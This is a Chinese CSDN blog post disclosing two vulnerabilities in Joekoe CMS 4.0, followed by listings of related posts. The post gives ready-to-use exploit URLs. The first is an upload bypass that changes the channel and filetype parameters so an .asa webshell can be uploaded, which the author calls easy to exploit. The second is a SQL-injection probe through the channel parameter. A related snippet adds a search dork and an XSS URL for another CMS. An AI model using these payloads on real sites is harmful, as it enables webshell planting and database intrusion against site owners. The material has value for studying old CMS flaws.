乔客(joekoe) CMS 4.0 的2个高危漏洞

最新推荐文章于 2012-01-12 16:38:53 发布
最新推荐文章于 2012-01-12 16:38:53 发布
阅读量772 收藏 1
点赞数
文章标签: cms sql url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HackCode/article/details/2742144
版权
  1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马了,具体url可以这样common/upload.asp?channel=use2&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=然后上传[PS:要登陆验证]

2. SQL注入漏洞:在Channel变量中加入诸如语句,比如:common/upload.asp?channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=

然后上传,就会报错
HackCode
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
乔客CMS5.0 具体也不用说什么了,就是好!
08-27
站点演习:http://cms5.demo.joekoe.com/
Joekoe CMS 4.x 上传漏洞
weixin_34293059的博客
08-06 161
from : http://www.siteweavercms.cn/Item/166.aspx 转载请注明:from http://www.siteweavercms.cn     出于对CMS的研究,发现Joekoe CMS 4.x出现上传漏洞,而且大多数情况下能直接拿数据库地址或数据库数密码。     为什么上传漏洞不是直接拿SHELL而是那这些呢?哈哈。。。     别急,下面一步...
joekoe CMS 4.0 上传漏洞
weixin_30716141的博客
07-30 214
影响版本:joekoe CMS 4.0 详细说明:Joekoe CMS 4.0 给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用...
Joekoe 4.0 CMS 免费版本最基本的修改方法和地方汇总(快速修改成自己的站)
楚雄的专栏
06-04 2146
  Joekoe 4.0 CMS 免费版本最基本的修改方法和地方汇总(快速修改成自己的站) 一,怎么删除或关闭不要的栏目?skin/default/header.html里面去掉菜单然后把
乔客Joekoe CMS 4.0.rar
05-25
乔客Joekoe CMS 4.0给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用...
乔客Joekoe CMS v4.0 Beta 2
03-26
JoekoeCMSv4.0作为乔客CMS系列的又一开源产品,结合了以前各版本的长处,采用了全新的核心,全新的模板机制,使得模板的替换,功能的增删变得更加的方便 以下功能及模块未包含在此Alpha中 商城多支付网关 拍卖及多...
access版乔客Joekoe CMS正式商版 4.0
03-25
JoekoeCMS4.0集企业商务、综合娱乐、信息门户以及个性展示等多位一体,且支持二次开发,用以拓展更符合用户自身需求的强大互动功能。 JoekoeCMS4.0改变了以往的模板机制,...乔客网(官方网站) http://www.joekoe.com/
乔客joekoe+cms+4.0+access+烽火门户版(官方原装商业版)
03-13
乔客Joekoe CMS 4.0 ACCESS 烽火门户版(官方原装商业版) 版本说明 此版本已为最新版本(包含Release和Patch1的更新) 版本最后更新时间为 2007-2-6 6:00:00 安装方法 只需将此目录中的所有文件夹及文件上传至网站根...
乔客建站专家 Joekoe CMS v5.0 RC build 20222
04-01
Joekoe CMS 5.0 给您带来一个经过完善的设计,在会员互动及安全方面有独特创新性的系统,适用于Windows NT服务环境下的的Web站点或商务平台的最佳解决方案。它精心设计的架构与功能机制,从个人到企业各方面应用的...
JRCMS企业网站管理系统 4.0.zip
05-24
JRCMS企业网站管理系统是由极瑞网络工作室开发的供企业展示型网站免费使用的开源企业网站系统,应多数网友的要求,本站开发了PC站 手机站并完美融合,一个后台即可操作,前台无缝对接,手机访问则自动识别跳转手机站。 JRCMS 4.0 更新日志:2016-11-29 本次修改幅度较大,前台后台都更换了新的框架,后台内核沿用老的极瑞企业网站管理系统的内核。增加了二级栏目分类,基本满足各种企业网站使用
乔客CMS安装教程详解
08-09
本教程详细的介绍了乔客CMS系统的安装步骤。
乔客建站专家 Joekoe CMS v5.0 RC build 20222-ASP源码.zip
01-21
ASP源码,压缩包解压密码:www.cqlsoft.com
冷雨夜江湖2.8江湖社区
12-21
冷雨夜江湖2.8江湖社区
W-Cms XSS和遍历目录漏洞
weixin_34238633的博客
01-12 239
官方网站:http://w-cms.info/ 下载地址:http://code.google.com/p/wcms/ 关键字: intext:"Powered by w-CMS" 版本:[2.01] XSS漏洞 http://hellxman.blog.51cto.com/index.php?bid=1&COMMENT=1 "XSS" htt...
JOEKOE CMS 4.0 简明模版分析
楚雄的专栏
06-04 1067
  JOEKOE CMS 4.0 简明模版分析 这篇文章仅仅是简单的JOEKOE CMS 4.0的模版分析,对不熟悉和面对模版无从下手的朋友应该会有所帮助.老鸟看来未免会觉得过于简单,还望
国内免费(开源)CMS系统大全
爱码农爱生活
01-11 3696
最近在网上搜集了一下国内的CMS程序,包括了类型,脚本,及其特点和评价,希望能对大家有所帮助,由于搜集于网络难免有不足和纰漏之处,还请大家能多多指正!首先还是介绍一下什么是CMSCMS(Content Management System),中文叫作整站系统、文章系统,大概2004以前,如果想进行网站内容管理,基本上都是靠手工维护,但千变万化的信息流,但没有好的程序支持,还继续靠手工完成是不可能的...
关于Joekoe CMS 4.0中表单节点XCML文件的详细说明讲解。
楚雄的专栏
06-04 5424
  关于Joekoe CMS 4.0中表单节点XCML文件的详细说明讲解。 以下是商城表单的XCML配置文件,因为商城的表单最为复杂,几乎囊括了所有会用到的表单元素,这里就以商城的表单配置
CMS 介绍
想飞的蜗牛
03-08 2155
 CMS(Content Management System),中文叫作整站系统、文章系统,大概2004以前,如果想进行网站内容管理,基本上都是靠手工维护,但千变万化的信息流,但没有好的程序支持,还继续靠手工完成是不可能的事,如果有一个好的系统来支撑你的网站,那将节省大量的人力物力,开发者就可能给客户一个软件包,可以用它定期人工修改网站。只要你配置安装好,你的编辑,在线记者,更新员只要定期更新数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值